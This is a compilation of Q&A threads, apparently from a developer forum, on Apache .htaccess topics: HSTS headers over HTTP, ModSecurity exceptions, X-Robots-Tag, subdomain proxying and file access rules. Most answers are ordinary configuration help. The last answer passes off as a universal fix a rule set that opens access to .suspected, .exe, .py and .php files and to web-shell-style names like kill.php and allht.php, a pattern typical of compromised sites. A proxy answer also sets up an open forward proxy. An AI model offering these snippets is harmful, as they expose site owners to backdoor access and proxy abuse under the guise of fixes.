I want to use https:// and non www. URL always. So I used the following code in my htaccess file. But i am getting an warning from https://hstspreload.org
RewriteCond %{HTTPS} off
RewriteRule .* https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
RewriteCond %{HTTP_HOST} !^www\.
RewriteRule .* https://www.%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
<ifModule mod_headers.c>
Header always set Strict-Transport-Security "max-age=31536000;
includeSubDomains; preload"
</ifModule>
Warning Message is given bellow :
Warning: Unnecessary HSTS header over HTTP
The HTTP page at http://mysiteurl.com sends an HSTS header. This has no effect over HTTP, and should be removed.
Please help me to rid the above warning. I tried with the following code also but it does not work #ref. topic
Header always set Strict-Transport-Security "max-age=31536000;
includeSubDomains; preload" env=HTTPS
Try removing the always attribute. So do this:
Header set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS
Instead of this:
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS
The other option is to only set this in the HTTPS VirtualHost's rather than in the main top level config:
Do this:
<VirtualHost *:443>
(All other virtual host config)
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
</VirtualHost>
Instead of this:
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
<VirtualHost *:443>
(All other virtual host config)
</VirtualHost>
This has the disadvantage (or advantage depending how you look at it!) of having to be added to each VirtualHost to take effect, whereas the first option would automatically be applied to all HTTPS virtual hosts.
And please, please, please be very careful with preload. It is not easily reversible! I would strongly recommend you run for a few months with good (i.e. error-free) config - which it appears you have not been doing - before submitting to preload list.
To give one example where preload can cause you problems: Supposing you run https://www.example.com, and this also responds to http://example.com and redirects you to https://example.com and then https://www.example.com (as the preload submissions require and as your config is set up to do). Then your website is lovely and secure. However, for companies that reuse their domain internally (which is quite common) this can cause problems - especially when you preload. For example, if you run a non-secure site which is not publicly available at http://intranet.example.com, or perhaps a non-secure development version of your site at http://dev.example.com, then you may not realise that this site must now also be served over HTTPS (as it is a subdomain of example.com). This rarely takes effect (as most people don't visit http://example.com or https://example.com so never see this HSTS header on top level domain) so you might never notice this potential problem during all your testing. However as soon as the preload takes effect, your browser will then know about the HSTS at top level domain even without visiting that and you instantly lose access to those HTTP-only sites, and cannot easily reverse this! Lots of companies still have lots of internal sites and tools served over HTTP only and upgrading them all to HTTPS (which should be done anyway btw!) at short notice would not be easy.
To get around this, either use a different domain internally, or you can only set this without includeSubDomain on the top level domain:
<VirtualHost *:443>
ServerName example.com
(All other virtual host config)
#Set HSTS at top level without includeSubDomain
Header always set Strict-Transport-Security "max-age=31536000"
</VirtualHost>
<VirtualHost *:443>
ServerName www.example.com
(All other virtual host config)
#Set HSTS at subdomain level
Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"
</VirtualHost>
This is not quite as secure (as someone can set up other subdomains over HTTP like http://wwww.example.com (note the four Ws) or http://fake.subdomain.com) but at least it doesn't break those HTTP-only sites. This setup will not be allowed through the preload list as it demands the more secure includeSubDomains even on the top level domain.
If you do want to use includeSubDomains even on the top level domain then I strongly recommend including a resource from the top level domain in your HTML (even if it redirects to the www version as HSTS is still set for 301s/302s). This way you are making sure visitors load the HSTS config at top level even before you preload. For example you could replace your logo to a call to the top level domain instead:
<img source="https://example.com/logo.png">
Run with that, and a small expiry, and no preload tag for a bit. Then increase the expiry. Then, if that all works, add the preload tag back and submit to the preload list.
This might all sound a bit painful, and perhaps you've thought of all this, but preloading can be incredibly dangerous if not thought through, due to the fact it is not easily reversible. In my opinion preloading HSTS is overkill for most sites though I agree it is the most secure option.
I solved the error in my litespeed based server by this method. Also works for apache. First add this code into your htaccess-
# Force HTTPS
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
Then add this code-
<IfModule mod_headers.c>
Header always set Strict-Transport-Security "max-age=63072000; includeSubdomains; preload" env=HTTPS
</IfModule>
Ubuntu 18.04 apache2 Letsencrytp
nano /etc/apache2/conf-enabled/ssl-params.conf
Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" env=HTTPS
service apache2 restart
remove or comment # all other vhost conf on apache.conf with
#Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" env=HTTPS
The issue is your are sending the header when the user is connected using HTTP
If you want to force them to use HTTPS, perform a redirect first like this.
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
Related
my payment gateway is blocked by mod_security when trying to access Woocommerce endpoint.
receiving 403 permission denied when trying to access the "/wc-api/my_gateway_payment_callback" endpoint.
im on an Litespeed shared host.
when disabling the mod_security from .htaccess
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
it solves the issue but exposes Wordpress admin to attacks, so i want to be more specific.
i tried to add a LocationMatch
<LocationMatch "/wc-api/my_gateway_payment_callback">
<IfModule mod_security.c>
SecRule REQUEST_URI "#beginsWith /wc-api/my_gateway_payment_callback/" \"phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
</IfModule>
</LocationMatch>
or
<IfModule mod_security.c>
SecRule REQUEST_URI "#beginsWith /my_gateway_payment_callback" \"phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
</IfModule>
but they dont work and im still getting the 403 error.
I can spot multiple problems here:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Are you really using ModSecurity v1? That is VERY old and suggests you are using Apache 1 as ModSecurity v1 is not compatible with ModSecurity v1. If not this should be:
<IfModule mod_security2.c>
SecRuleEngine Off
</IfModule>
Next you say:
it solves the issue but exposes Wordpress admin to attacks
I don't see how it can solve the issue unless you are on REALLY old software, so suspect this is a red herring.
so i want to be more specific. i tried to add a LocationMatch
Good idea to be more specific. However LocationMatch runs quite late in Apache process - after ModSecurity rules will have run so this will not work. However you don’t really need LocationMatch since your rule already scopes it to that location. So let’s look at the next two pieces:
SecRule REQUEST_URI "#beginsWith /wc-api/my_gateway_payment_callback/" \"phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
SecRuleRemoveById 3000
You shouldn't need to remove the rule if you allow it on the previous lines. Typically you would only do one or the other.
or
<IfModule mod_security.c>
SecRule REQUEST_URI "#beginsWith /my_gateway_payment_callback" > \
"phase:2,id:1000,nolog,pass, allow, msg:'Update URI accessed'"
</IfModule>
but they dont work and im still getting the 403 error.
You have pass (which means continue on to the next rule) and allow (which means skip all future rules). It seems to me you only want the latter and not the former. As these are conflicting, I suspect ModSecurity will action the former first hence why it is not working.
However the better way is to look at the Apache error logs to see what rule it's failing on (is it rule 3000 as per your other LocationMatch workaround?) and just disable that one rule rather than disable all rules for that route.
So all in all I'm pretty confused with your question as seems to be a lot of inconsistencies and things that are just wrong in there...
I'm trying to set HTST Header in .htaccess based on kind of request (https or http). I tried to modify this piece of code, which sets header "max-age=300" to image files by checking E variable:
RewriteRule \.(png|gif|jpg) - [E=image:1]
Header set Cache-Control "max-age=300" env=image
This way:
RewriteCond %{HTTPS} on
RewriteRule ^ - [E=STRICT_ENV:1]
Header always set Strict-Transport-Security "max-age=63072000;" env=STRICT_ENV
But seems that STRICT_ENV variable is not set at all.
Give this header a try:
Header set Strict-Transport-Security "max-age=63072000" env=HTTPS
Can I 'noindex, follow' a specific page using x robots in .htaccess?
I've found some instructions for noindexing types of files, but I can't find instruction to noindex a single page, and what I have tried so far hasn't worked.
This is the page I'm looking to noindex:
http://www.examplesite.com.au/index.php?route=news/headlines
This is what I have tried so far:
<FilesMatch "/index.php?route=news/headlines$">
Header set X-Robots-Tag "noindex, follow"
</FilesMatch>
Thanks for your time.
It seems to be impossible to match the request parameters from within a .htaccess file. Here is a list of what you can match against: http://httpd.apache.org/docs/2.2/sections.html
It will be much easier to do it in your script. If you are running on PHP try:
header('X-Robots-Tag: noindex, follow');
You can easily build conditions on $_GET, REQUEST_URI and so on.
RewriteEngine on
RewriteBase /
#set env variable if url matches
RewriteCond %{QUERY_STRING} ^route=news/headlines$
RewriteRule ^index\.php$ - [env=NOINDEXFOLLOW:true]
#only sent header if env variable set
Header set X-Robots-Tag "noindex, follow" env=NOINDEXFOLLOW
FilesMatch works on (local) files, not urls. So it would try to match only the /index.php part of the url. <location> would be more appropriate, but as far as I can read from the documentation, querystrings are not allowed here. So I ended up with the above solution (I really liked this challenge). Although php would be the more obvious place to put this, but that is up to you.
The solution requires mod_rewrite, and mod_headers of course.
Note that you'll need the mod_headers module enabled to set the headers.
Though like others have said, it seems better to use the php tag. Does that not work?
According to Google the syntax would be a little different:
<Files ~ "\.pdf$">
Header set X-Robots-Tag "noindex, nofollow"
</Files>
https://developers.google.com/webmasters/control-crawl-index/docs/robots_meta_tag
I would like to change the link "http://blog.test.com/" to "http://www.test.com/blog/".
I've tried the following code in my .htaccess
RewriteRule ^blog.test.com?$ test.com/blog [NC,R=301,L]
Did I miss anything? Thanks
If you're using apache, you need to match the host part of the url (e.g. blog.test.com) in a RewriteCond:
RewriteCond %{HTTP_HOST} ^blog.test.com$ [NC]
RewriteRule ^(.*)$ http://www.test.com/blog/$1 [R=301,L]
first of all, you must replace http://blog.test.com/whatever_or_empty to http://www.test.com/blog/whatever_or_empty in your HTML hrefs.
blog.test.com although a sub domain, is a different URL. i.e. when a RewriteRule does a rewrite to another URL an external redirect will occur. This will reflect in the browser. Be a temporary redirect(302(the default)) or permanent redirect(301).
So, using url rewriting to change the link http://blog.test.com/ to http://www.test.com/blog/ is useless.
Although, you can achieve this using Apache Module mod_proxy.
The Apache Proxy Modules has these:
mod_proxy: The core module deals with proxy infrastructure and configuration and managing a proxy request.
mod_proxy_http: This handles fetching documents with HTTP and HTTPS.
mod_proxy_ftp: This handles fetching documents with FTP.
mod_proxy_connect: This handles the CONNECT method for secure (SSL) tunneling.
mod_proxy_ajp: This handles the AJP protocol for Tomcat and similar backend servers.
mod_proxy_balancer implements clustering and load-balancing over multiple backends.
mod_cache, mod_disk_cache, mod_mem_cache: These deal with managing a document cache. To enable caching requires mod_cache and one or both of disk_cache and mem_cache.
mod_proxy_html: This rewrites HTML links into a proxy's address space.
mod_xml2enc: This supports internationalisation (i18n) on behalf of mod_proxy_html and other markup-filtering modules. space.
mod_headers: This modifies HTTP request and response headers.
mod_deflate: Negotiates compression with clients and backends.
You need at-least mod_proxy and mod_proxy_http modules enabled for the proxy to work:
you should have lines similar to these in your apache's conf file:
LoadModule proxy_http_module modules/mod_proxy_http.so
LoadModule proxy_module modules/mod_proxy.so
use this in your Virtualhost of http://www.test.com
ProxyPass /blog http://blog.test.com
ProxyPassReverse /blog http://blog.test.com
ProxyRequests On
ProxyVia On
<Proxy *>
Order allow,deny
Allow from all
</Proxy>
Definitions:
ProxyPass Apache Docs.
ProxyPassReverse Apache Docs.
ProxyRequests Apache Docs.
Proxyvia Apache Docs.
You can also use a cache with mod_cache: mod_cache.
For more on caching, refer here: mod_cache Apache Docs.
I saw several htaccess example disabling some files to access:
<Files ~ "\.(js|sql)$">
order deny,allow
deny from all
</Files>
for example, this prevents to access all .JS and .SQL files, the others are enabled. I want the contrary! I want those files to be ENABLED, all others to be prevented. How to achieve this?
Vorapsak's answer is almost correct. It's actually
order allow,deny
<Files ~ "\.(js|sql)$">
allow from all
</Files>
You need the order directive at the top (and you don't need anything else).
The interesting thing is, it seems we can't just negate the regex in FilesMatch, which is... weird, especially since the "!" causes no server errors or anything. Well, duh.
and a bit of explanation:
The order cause tells the server about its expected default behaviour. The
order allow,deny
tells the server to process the "allow" directives first: if a request matches any allow directive, it's marked as okay. Then the "deny" directives are evaulated: if a request matches any deny directives, it's denied (it doesn't matter if it was allowed in the first pass). If no matches were found, the file is denied.
The directive
order deny,allow
works the opposite way: first the server processes the "deny" directives: if a request matches, it's marked to be denied. Then the "allow" directives are evaulated: if a request matches an allow directive, it's allowed in, even if it matches a deny directive earlier. If a request matches nothing, the file is allowed.
In this specific case, the server first tries to match the allow directives: it sees that js and sql files are allowed, so a request to foo.js goes through; a request to bar.php matches no directives, so it's denied.
If we swap the directive to "order deny,allow", then foo.js will go through (for being a js), and bar.php will also go through, as it matches no patterns.
oh and, one more thing: directives in a section (i.e. < Files> and < Directory>) are always evaulated after the main body of the .htaccess file, overwriting it. That's why Vorapsak's solution did not work as inteded: the main .htaccess denied the request, then the < Files> order was processed, and it allowed the request.
Htaccess is magic of the worst kind, but there's logic to it.
Did you try setting a
deny from all
outside (before) the tag, then changing the
deny from all
to
allow from all
inside? Something like
deny from all
<Files ~ "\.(js|sql)$">
order allow,deny
allow from all
</Files>
if you are having trouble with your website, use this htaccess code. It solves all error you may likely encounter
DirectoryIndex index.html index.php
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Allow from all
</FilesMatch>
<FilesMatch "^(votes|themes|xmlrpcs|uninstall|wp-login|locale|admin|kill|a|allht|index|index1|admin2|license3|votes4|foot5|load|home|items|store).php$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
If this help you, don't forget to thump up!!!